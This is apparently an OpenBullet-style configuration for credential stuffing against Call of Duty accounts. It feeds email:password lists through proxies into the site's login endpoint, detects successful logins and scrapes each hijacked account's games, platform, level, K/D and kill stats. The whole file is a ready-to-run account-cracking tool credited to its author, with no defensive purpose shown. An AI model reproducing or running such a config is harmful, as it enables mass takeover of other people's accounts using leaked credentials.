[SETTINGS] { "Name": "Call Of Duty ", "SuggestedBots": 68, "MaxCPM": 0, "LastModified": "2020-10-16T22:11:09.2697046+04:00", "AdditionalInfo": "", "Author": "YASHVIRGAMING#0388", "Version": "1.4.4 [Anomaly]", "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "BanProxyAfterGoodStatus": false, "EncodeData": false, "AllowedWordlist1": "MailPass", "AllowedWordlist2": "", "DataRules": [], "CustomInputs": [], "CaptchaUrl": "", "Base64": "", "Grayscale": false, "RemoveLines": false, "RemoveNoise": false, "Dilate": false, "Threshold": 1.0, "DiffKeep": 0.0, "DiffHide": 0.0, "Saturate": false, "Saturation": 0.0, "Transparent": false, "Contour": false, "OnlyShow": false, "ContrastGamma": false, "Contrast": 1.0, "Gamma": 1.0, "Brightness": 1.0, "RemoveLinesMin": 0, "RemoveLinesMax": 0, "Crop": false, "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [SCRIPT] #csrf REQUEST GET "https://profile.callofduty.com/cod/login" HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" HEADER "Connection: keep-alive" HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" HEADER "Accept-Language: en-gb" HEADER "Referer: https://www.google.co.uk/" HEADER "Accept-Encoding: gzip, deflate, br" #csrf PARSE "" LR "" -> VAR "cs" #Login REQUEST POST "https://profile.callofduty.com/do_login?new_SiteId=cod" AutoRedirect=FALSE CONTENT "username=&remember_me=true&password=&_csrf=" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "Content-Type: application/x-www-form-urlencoded" HEADER "Origin: https://profile.callofduty.com" HEADER "Accept-Encoding: gzip, deflate, br" HEADER "Connection: keep-alive" HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" HEADER "Referer: https://profile.callofduty.com/cod/login" HEADER "Accept-Language: en-gb" #Login KEYCHECK KEYCHAIN Failure OR KEY "" Contains "LOGIN_FAILURE" KEY "" Contains "LOGIN_FAILURE" KEYCHAIN Success OR KEY "" Contains "atkn" KEY "" Contains "atkn" KEYCHAIN Ban OR KEY "Captcha error. Please try again." HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" #Games PARSE "" JSON "title" Recursive=TRUE CreateEmpty=FALSE -> CAP "Games" #Platform PARSE "" JSON "platform" Recursive=TRUE CreateEmpty=FALSE -> CAP "Platform" #Platform PARSE "" JSON "platform" -> VAR "plat" #User PARSE "" JSON "username" -> VAR "user" #encode_user FUNCTION URLEncode "" -> VAR "user" #Stats REQUEST GET "https://my.callofduty.com/api/papi-client/stats/cod/v1/title/mw/platform//gamer//profile/type/wz" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" #Free KEYCHECK BanOnToCheck=FALSE KEYCHAIN Custom "FREE" OR KEY "{\"status\":\"success\",\"data\":{\"title\":null,\"platform\":null,\"username\":\"ivanichi_99\",\"type\":\"wz\",\"level\":0.0,\"maxLevel\":0.0,\"levelXpRemainder\":0.0,\"levelXpGained\":0.0,\"prestige\":0.0,\"prestigeId\":0.0,\"maxPrestige\":0.0,\"totalXp\":0.0,\"paragonRank\":0.0,\"paragonId\":0.0,\"s\":0.0,\"lifetime\":{\"all\":{\"properties\":null},\"mode\":{},\"map\":{}},\"weekly\":{\"all\":{\"properties\":null},\"mode\":{},\"map\":{}},\"engagement\":null}}" KEY "path\":\"/stats/cod/v1/title/mw/platform/gamer/profile/type/wz\"}" #Level PARSE "" JSON "level" CreateEmpty=FALSE -> CAP "Level" #GetUserCombat REQUEST GET "https://my.callofduty.com/player/combatrecord" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" #KD PARSE "" LR "kdRatio:" "," -> CAP "KDA (Last week)" PARSE "" LR "kills: " "," CreateEmpty=FALSE -> CAP "kills" PARSE "" LR "score: " "," CreateEmpty=FALSE -> CAP "Score" FUNCTION Constant "https://profile.callofduty.com/cod/login" -> CAP "\"ℹLogin Linkℹ\" " FUNCTION Constant " @YashvirGaming0388" -> CAP "Config By"